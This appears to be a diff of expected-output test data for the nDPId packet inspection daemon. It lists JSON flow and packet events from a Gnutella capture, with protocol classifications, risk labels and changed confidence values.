+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":160009,"flow_last_seen":163034,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":3,"flow_last_seen":350801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":350801,"pkt":"UlQAEjUCCAAn5uVZCABFAABUUWcAAIARlZ8KAAIPVEfzPHAJhsIAQN+fXS\/iNTECAGQaxPLpTglwD4ABACEAAAD5AHBpbmtmbG95ZADDAlFLRO45aqEDU0NQQAFaQIJQUkA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":2,"flow_last_seen":350982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":350982,"pkt":"UlQAEjUCCAAn5uVZCABFAAA49UMAAIARRGEKAAIPR++tEnAJWx8AJJ\/UjSsxAo9FSZH\/5RaddLKjAwABAAUAAADDglFLQA=="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5386,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":3,"flow_last_seen":351110,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":351110,"pkt":"CAAn5uVZUlQAEjUCCABFAABKDVAAAEARbENH760SCgACD1sfcAkANlLBjSsxAo9FSZH\/5RaddLKjAwEBABcAAAAfW0fvrRIAAAAACAAAAMOCUUtEmW5VTg=="} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":355387,"flow_last_seen":355387,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":355387,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.125.218.84","src_port":28681,"dst_port":17561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":355387,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":355387,"pkt":"UlQAEjUCCAAn5uVZCABFAABDeM0AAIARhvwKAAIPVH3aVHAJRJkAL52kWv4xAksIMkL\/WuRk66hXAwABABAAAADDA1NDUEECglZDRUdUS0di"} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":88941,"flow_last_seen":179376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":88941,"flow_last_seen":179376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 